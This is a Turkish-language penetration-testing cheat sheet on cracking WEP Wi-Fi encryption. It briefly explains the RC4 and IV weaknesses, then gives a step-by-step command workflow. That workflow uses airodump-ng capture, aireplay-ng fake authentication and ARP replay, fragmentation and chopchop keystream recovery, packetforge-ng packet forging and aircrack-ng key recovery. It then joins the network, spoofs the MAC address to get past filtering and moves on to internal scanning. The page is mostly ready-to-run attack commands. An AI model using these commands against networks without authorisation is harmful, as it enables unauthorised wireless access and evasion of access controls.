Skip to content

WEP Kırma

WEP eski / zayıf

WEP eski / zayıf

WEP (Wired Equivalent Privacy), RC4’ü zayıf ve kısa IV (initialization vector) ile kullandığından tasarımsal olarak kırıktır. Yeterli sayıda IV toplandığında anahtar, parolanın gücünden bağımsız olarak istatistiksel saldırıyla kurtarılır. Günümüzde nadir görülse de eski cihaz, endüstriyel ve IoT ağlarında hâlâ karşılaşılır — bulgu tek başına kritiktir.

IV 24-bit → tekrarlar kaçınılmaz
Zayıf IV + RC4 keystream sızıntısı → FMS / PTW istatistiksel saldırı
ARP replay → aynı keystream ile trafik çoğaltma → IV hızla birikir
Anahtar uzunluğu (64/128-bit) pratikte engel değil; IV sayısı kritik
- Monitor + injection (aireplay-ng -9)
- Hedef ENC=WEP (airodump)
- Mümkünse ilişkili istemci (ARP üretimi kolaylaşır)
- aircrack-ng suite
Terminal window
sudo airodump-ng wlan0mon
  1. IV topla — hedef AP’yi dinleyerek #Data sütununu büyüt:

    Terminal window
    sudo iw dev wlan0mon set channel 6
    Terminal window
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0mon
  2. Sahte authentication (gerekirse) — bazı AP’ler ilişkili olmayan istemciden replay kabul etmez:

    Terminal window
    sudo aireplay-ng -1 0 -e "OldWifi" -a AA:BB:CC:DD:EE:FF \
    -h YOUR_MAC wlan0mon
  3. ARP replay ile trafiği hızlandır :

    Terminal window
    sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon
    Terminal window
    sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF \
    -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon
  4. Anahtarı kır — genelde ~20k–80k IV (PTW); eski FMS daha fazla ister:

    Terminal window
    aircrack-ng -b AA:BB:CC:DD:EE:FF wep-01.cap
    Terminal window
    aircrack-ng -z wep-01.cap

#Data ~5000–20000 civarında aircrack-ng denemeye başlanabilir; başarı oranı IV kalitesine göre artar.

İstemci veya doğal ARP yoksa keystream elde edip sahte paket enjekte edilir:

Terminal window
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon
Terminal window
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon
Terminal window
packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h YOUR_MAC \
-k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXX.xor -w arp.cap
Terminal window
sudo aireplay-ng -2 -r arp.cap wlan0mon
Terminal window
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0mon
Terminal window
watch -n 30 'aircrack-ng wep-01.cap'
Terminal window
sudo iwconfig wlan0 essid "OldWifi" key XX:XX:XX:XX:XX
Terminal window
sudo nmcli connection add type wifi ifname wlan0 con-name wep-old \
ssid "OldWifi" wifi-sec.key-mgmt none wifi-sec.wep-key0 XXXXX

Sonrasında iç ağ taraması: scanning.

Nadir Shared Key Auth’da authentication challenge yakalanıp keystream çıkarılabilir:

Terminal window
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h YOUR_MAC wlan0mon
Injection başarısız → sürücü/adaptör; -9 testi
Fake auth rejected → MAC filter; başka MAC dene / client MAC spoof
IV birikmiyor → fragmentation/chopchop
aircrack KEY NOT FOUND → daha fazla IV; doğru BSSID filtresi (-b)
WEP40 vs WEP104 → aircrack genelde ikisini dener
Terminal window
sudo ip link set wlan0mon down
Terminal window
sudo macchanger -m CC:DD:EE:FF:00:11 wlan0mon
Terminal window
sudo ip link set wlan0mon up

aircrack · WEP

embedded tool
Generated command
aircrack-ng wep-01.cap
airodump ENC=WEP → kanal kilit
→ fake auth → ARP replay
→ #Data ↑ → aircrack-ng
→ WEP key → ağa katıl → iç pentest
ARP yok → fragmentation → packetforge ARP → replay → crack